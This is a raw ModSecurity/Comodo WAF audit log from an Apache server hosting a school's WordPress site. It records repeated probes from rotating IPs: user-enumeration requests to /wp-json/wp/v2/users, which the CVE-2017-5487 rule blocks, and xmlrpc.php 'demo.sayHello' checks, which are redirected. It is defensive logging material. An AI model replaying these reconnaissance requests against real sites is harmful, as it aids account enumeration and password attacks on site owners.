"/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462325170165 5930 (- - -) Stopwatch2: 1746462325170165 5930; combined=4465, p1=606, p2=3625, p3=35, p4=34, p5=96, sr=131, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be0c3c68-Z-- --25c72370-A-- [05/May/2025:23:26:21 +0700] aBjmrU2V_h1VFAgsfgZ_7gAAAAA 103.236.140.4 56898 103.236.140.4 8181 --25c72370-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --25c72370-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25c72370-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462381441458 2735 (- - -) Stopwatch2: 1746462381441458 2735; combined=1230, p1=417, p2=783, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25c72370-Z-- --46c91c76-A-- [05/May/2025:23:26:24 +0700] aBjmsARwKNFSM6B7_Lai5QAAAJY 103.236.140.4 56934 103.236.140.4 8181 --46c91c76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --46c91c76-C-- demo.sayHello --46c91c76-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --46c91c76-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462384562361 5048 (- - -) Stopwatch2: 1746462384562361 5048; combined=3780, p1=478, p2=3085, p3=30, p4=33, p5=91, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46c91c76-Z-- --d4fb056d-A-- [05/May/2025:23:26:47 +0700] aBjmx_ZJDMuQndL03JNf6wAAAEs 103.236.140.4 57102 103.236.140.4 8181 --d4fb056d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d4fb056d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4fb056d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462407859477 2382 (- - -) Stopwatch2: 1746462407859477 2382; combined=977, p1=350, p2=607, p3=0, p4=0, p5=20, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4fb056d-Z-- --9613357c-A-- [05/May/2025:23:26:50 +0700] aBjmyvZJDMuQndL03JNf7QAAAEI 103.236.140.4 57130 103.236.140.4 8181 --9613357c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9613357c-C-- demo.sayHello --9613357c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9613357c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462410589115 5764 (- - -) Stopwatch2: 1746462410589115 5764; combined=4253, p1=552, p2=3466, p3=36, p4=36, p5=97, sr=75, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9613357c-Z-- --204d1665-A-- [05/May/2025:23:26:52 +0700] aBjmzIZWvR7-42f6JrAPqgAAANc 103.236.140.4 57150 103.236.140.4 8181 --204d1665-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --204d1665-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --204d1665-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462412587878 2927 (- - -) Stopwatch2: 1746462412587878 2927; combined=1273, p1=419, p2=820, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --204d1665-Z-- --c03b2979-A-- [05/May/2025:23:26:55 +0700] aBjmzwRwKNFSM6B7_Lai8QAAAIs 103.236.140.4 57182 103.236.140.4 8181 --c03b2979-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.253 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c03b2979-C-- demo.sayHello --c03b2979-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c03b2979-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462415653775 5533 (- - -) Stopwatch2: 1746462415653775 5533; combined=4137, p1=557, p2=3360, p3=31, p4=34, p5=91, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c03b2979-Z-- --ae39264a-A-- [05/May/2025:23:26:58 +0700] aBjm0vZJDMuQndL03JNf9QAAAEc 103.236.140.4 57214 103.236.140.4 8181 --ae39264a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ae39264a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae39264a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462418380242 2661 (- - -) Stopwatch2: 1746462418380242 2661; combined=1220, p1=414, p2=777, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae39264a-Z-- --0316657e-A-- [05/May/2025:23:27:01 +0700] aBjm1fZJDMuQndL03JNf-gAAAFM 103.236.140.4 57234 103.236.140.4 8181 --0316657e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.167 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0316657e-C-- demo.sayHello --0316657e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0316657e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462421242788 5526 (- - -) Stopwatch2: 1746462421242788 5526; combined=4114, p1=522, p2=3367, p3=32, p4=35, p5=93, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0316657e-Z-- --70d02716-A-- [05/May/2025:23:28:54 +0700] aBjnRk2V_h1VFAgsfgaAOwAAABU 103.236.140.4 58182 103.236.140.4 8181 --70d02716-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --70d02716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70d02716-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462534083860 2989 (- - -) Stopwatch2: 1746462534083860 2989; combined=1311, p1=421, p2=861, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70d02716-Z-- --02fba25a-A-- [05/May/2025:23:28:57 +0700] aBjnSU2V_h1VFAgsfgaAPgAAAAg 103.236.140.4 58202 103.236.140.4 8181 --02fba25a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.239 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02fba25a-C-- demo.sayHello --02fba25a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02fba25a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462537319173 6021 (- - -) Stopwatch2: 1746462537319173 6021; combined=4362, p1=527, p2=3601, p3=31, p4=35, p5=98, sr=72, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02fba25a-Z-- --23cb7b79-A-- [05/May/2025:23:35:04 +0700] aBjouARwKNFSM6B7_LakIgAAAJI 103.236.140.4 33170 103.236.140.4 8181 --23cb7b79-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --23cb7b79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23cb7b79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462904393858 4185 (- - -) Stopwatch2: 1746462904393858 4185; combined=2091, p1=609, p2=1448, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23cb7b79-Z-- --a314cd16-A-- [05/May/2025:23:35:07 +0700] aBjouwRwKNFSM6B7_LakKAAAAIA 103.236.140.4 33194 103.236.140.4 8181 --a314cd16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a314cd16-C-- demo.sayHello --a314cd16-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a314cd16-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462907143922 6720 (- - -) Stopwatch2: 1746462907143922 6720; combined=5258, p1=563, p2=4321, p3=50, p4=70, p5=151, sr=79, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a314cd16-Z-- --b06bdb2d-A-- [05/May/2025:23:35:40 +0700] aBjo3PZJDMuQndL03JNhIgAAAEQ 103.236.140.4 33478 103.236.140.4 8181 --b06bdb2d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b06bdb2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b06bdb2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462940024362 2486 (- - -) Stopwatch2: 1746462940024362 2486; combined=1398, p1=452, p2=914, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b06bdb2d-Z-- --ce1f0928-A-- [05/May/2025:23:35:43 +0700] aBjo34ZWvR7-42f6JrAQdgAAAM4 103.236.140.4 33514 103.236.140.4 8181 --ce1f0928-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.102 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ce1f0928-C-- demo.sayHello --ce1f0928-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce1f0928-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462943205141 5049 (- - -) Stopwatch2: 1746462943205141 5049; combined=3755, p1=527, p2=3025, p3=30, p4=29, p5=84, sr=64, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce1f0928-Z-- --71a1be36-A-- [05/May/2025:23:38:28 +0700] aBjphE2V_h1VFAgsfgaBewAAAAU 103.236.140.4 34948 103.236.140.4 8181 --71a1be36-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.252 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --71a1be36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71a1be36-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463108919918 2368 (- - -) Stopwatch2: 1746463108919918 2368; combined=1294, p1=430, p2=834, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71a1be36-Z-- --20928b29-A-- [05/May/2025:23:38:31 +0700] aBjph_ZJDMuQndL03JNhugAAAEg 103.236.140.4 34972 103.236.140.4 8181 --20928b29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.252 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20928b29-C-- demo.sayHello --20928b29-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20928b29-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463111694221 5581 (- - -) Stopwatch2: 1746463111694221 5581; combined=4235, p1=514, p2=3426, p3=97, p4=66, p5=78, sr=76, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
